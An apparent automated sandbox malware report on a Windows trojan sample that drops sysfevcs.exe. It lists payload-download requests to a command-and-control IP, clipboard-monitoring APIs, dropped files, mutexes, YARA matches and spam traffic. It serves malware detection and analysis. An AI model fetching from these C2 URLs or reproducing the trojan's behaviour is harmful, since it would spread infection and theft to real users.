                              Source: sysfevcs.exe, 00000001.00000003.294174080.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.292642179.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.296875784.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.292536560.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.294393679.0000000002FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1w
                              Source: sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2
                              Source: sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2E
                              Source: sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2N
                              Source: sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2W
                              Source: sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2t
                              Source: sysfevcs.exe, 00000001.00000002.485371114.0000000002FEE000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3
                              Source: sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3a
                              Source: sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3j
                              Source: sysfevcs.exe, 00000001.00000002.485371114.0000000002FEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3ystem32
                              Source: sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4
                              Source: sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4/
                              Source: sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/43
                              Source: sysfevcs.exe, 00000001.00000002.485142769.000000000260A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/47
                              Source: sysfevcs.exe, 00000001.00000002.485371114.0000000002FEE000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4LMEM0
                              Source: sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4Po
                              Source: sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4X
                              Source: sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4a
                              Source: sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4s
                              Source: sysfevcs.exe, 00000001.00000002.485371114.0000000002FEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4ystem32
                              Source: sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5
                              Source: sysfevcs.exe, 00000001.00000003.297277850.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.342282452.0000000002FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5-586C90B09FEF
                              Source: l3Qj8QhTYZ.exe, 2676917645.exe.1.dr, sysfevcs.exe.15.dr, sysfevcs.exe.0.drString found in binary or memory: http://185.215.113.66/5858874sysfevcs.exeWindows
                              Source: sysfevcs.exe, 00000001.00000003.342306248.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485326798.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.341876769.0000000002FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5j
                              Source: sysfevcs.exe, 00000001.00000003.297277850.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000003.342282452.0000000002FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/ED-4BF2-83AB-37B7B86E58B0
                              Source: sysfevcs.exe, 00000001.00000002.485423655.0000000003004000.00000004.00000800.00020000.00000000.sdmp, sysfevcs.exe, 00000001.00000002.485409180.0000000002FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/getntbup
                              Source: sysfevcs.exe, 00000001.00000002.485371114.0000000002FEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/getntbup:
                              Source: sysfevcs.exe, 00000001.00000002.485371114.0000000002FEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/getntbupr
                              Source: sysfevcs.exe, 00000001.00000002.485371114.0000000002FEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/getntbupu
                              Source: 2350331867.exe, 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmp, 2350331867.exe, 0000000C.00000002.518421065.0000000000D8C000.00000004.00000010.00020000.00000000.sdmp, 2350331867.exe, 0000000C.00000002.520226091.00000000033D9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pol/
                              Source: 2350331867.exe, 0000000C.00000002.520226091.00000000033D9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pol/608.txt
                              Source: 2350331867.exe, 0000000C.00000002.520226091.00000000033D9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/pol/http://185.215.113.66/pol/n.txt
                              Source: sysfevcs.exe, 00000001.00000003.341785730.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ica.215.113.66/1
                              Source: 2350331867.exe, 2350331867.exe, 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmp, 2350331867.exe, 0000000C.00000000.320868021.0000000000903000.00000002.00000001.01000000.00000008.sdmp, 2350331867.exe.1.drString found in binary or memory: http://icanhazip.com/
                              Source: 2350331867.exe, 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmp, 2350331867.exe, 0000000C.00000000.320868021.0000000000903000.00000002.00000001.01000000.00000008.sdmp, 2350331867.exe.1.drString found in binary or memory: http://icanhazip.com/.
                              Source: sysfevcs.exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: sysfevcs.exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                              Source: unknownDNS traffic detected: queries for: yahoo.com
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_0040E450 WSARecv,WSARecv,WSAGetLastError,Sleep,WSARecv,0_2_0040E450
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Host: icanhazip.com
                              Source: global trafficHTTP traffic detected: GET /pol/n.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /pol/608.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66If-Modified-Since: Mon, 12 Dec 2022 17:05:27 GMTIf-None-Match: "63975f57-3700"
                              Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /getntbup HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_00403ED0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,0_2_00403ED0
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_00403ED0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,0_2_00403ED0
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_00403ED0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,0_2_00403ED0

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: Yara matchFile source: l3Qj8QhTYZ.exe, type: SAMPLE
                              Source: Yara matchFile source: 15.2.2676917645.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.0.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.l3Qj8QhTYZ.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.0.2676917645.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 16.0.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 16.2.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.l3Qj8QhTYZ.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000010.00000002.518234685.000000000040F000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.260711622.000000000040F000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.507786324.000000000040F000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.262918293.00000000005B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000000.482216563.000000000040F000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000003.507495356.0000000000566000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.251631749.000000000040F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000010.00000000.505235810.000000000040F000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.279876335.000000000040F000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.485944774.0000000004610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: l3Qj8QhTYZ.exe PID: 6012, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysfevcs.exe PID: 6120, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysfevcs.exe PID: 4764, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 2676917645.exe PID: 7920, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysfevcs.exe PID: 2088, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\2676917645.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\sysfevcs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\sysfevcs.exe, type: DROPPED
                              Source: SMTPNetwork traffic detected: Mail traffic on many different IPs 138
                              Source: l3Qj8QhTYZ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exe, type: DROPPEDMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeFile created: C:\Windows\sysfevcs.exeJump to behavior
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_0040EA080_2_0040EA08
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_00408CC00_2_00408CC0
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_004034800_2_00403480
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_00402E900_2_00402E90
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_004063590_2_00406359
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_004063300_2_00406330
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_0040EA081_2_0040EA08
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_00408CC01_2_00408CC0
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_004034801_2_00403480
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_00402E901_2_00402E90
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_004063591_2_00406359
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_004063301_2_00406330
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_0040EA082_2_0040EA08
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_00408CC02_2_00408CC0
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_004034802_2_00403480
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_00402E902_2_00402E90
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_004063592_2_00406359
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_004063302_2_00406330
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_0040EC4D NtQueryVirtualMemory,0_2_0040EC4D
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_0040BB80 NtQuerySystemTime,RtlTimeToSecondsSince1980,0_2_0040BB80
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_0040EC4D NtQueryVirtualMemory,1_2_0040EC4D
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_0040BB80 NtQuerySystemTime,RtlTimeToSecondsSince1980,1_2_0040BB80
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_0040EC4D NtQueryVirtualMemory,2_2_0040EC4D
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_0040BB80 NtQuerySystemTime,RtlTimeToSecondsSince1980,2_2_0040BB80
                              Source: l3Qj8QhTYZ.exeReversingLabs: Detection: 84%
                              Source: l3Qj8QhTYZ.exeVirustotal: Detection: 61%
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeFile read: C:\Users\user\Desktop\l3Qj8QhTYZ.exeJump to behavior
                              Source: l3Qj8QhTYZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\l3Qj8QhTYZ.exe C:\Users\user\Desktop\l3Qj8QhTYZ.exe
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeProcess created: C:\Windows\sysfevcs.exe C:\Windows\sysfevcs.exe
                              Source: unknownProcess created: C:\Windows\sysfevcs.exe "C:\Windows\sysfevcs.exe"
                              Source: C:\Windows\sysfevcs.exeProcess created: C:\Users\user\AppData\Local\Temp\2350331867.exe C:\Users\user\AppData\Local\Temp\2350331867.exe
                              Source: C:\Windows\sysfevcs.exeProcess created: C:\Users\user\AppData\Local\Temp\2676917645.exe C:\Users\user\AppData\Local\Temp\2676917645.exe
                              Source: C:\Users\user\AppData\Local\Temp\2676917645.exeProcess created: C:\Users\user\sysfevcs.exe C:\Users\user\sysfevcs.exe
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeProcess created: C:\Windows\sysfevcs.exe C:\Windows\sysfevcs.exeJump to behavior
                              Source: C:\Windows\sysfevcs.exeProcess created: C:\Users\user\AppData\Local\Temp\2350331867.exe C:\Users\user\AppData\Local\Temp\2350331867.exeJump to behavior
                              Source: C:\Windows\sysfevcs.exeProcess created: C:\Users\user\AppData\Local\Temp\2676917645.exe C:\Users\user\AppData\Local\Temp\2676917645.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2676917645.exeProcess created: C:\Users\user\sysfevcs.exe C:\Users\user\sysfevcs.exeJump to behavior
                              Source: C:\Windows\sysfevcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                              Source: C:\Windows\sysfevcs.exeFile created: C:\Users\user\tbnds.datJump to behavior
                              Source: C:\Windows\sysfevcs.exeFile created: C:\Users\user\AppData\Local\Temp\2350331867.exeJump to behavior
                              Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@10/12@1685/100
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_00404AA0 CoInitialize,CoCreateInstance,wsprintfW,0_2_00404AA0
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_004051D0 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,0_2_004051D0
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeMutant created: \Sessions\1\BaseNamedObjects\69767
                              Source: C:\Users\user\AppData\Local\Temp\2676917645.exeMutant created: \Sessions\1\BaseNamedObjects\5858874
                              Source: C:\Windows\sysfevcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
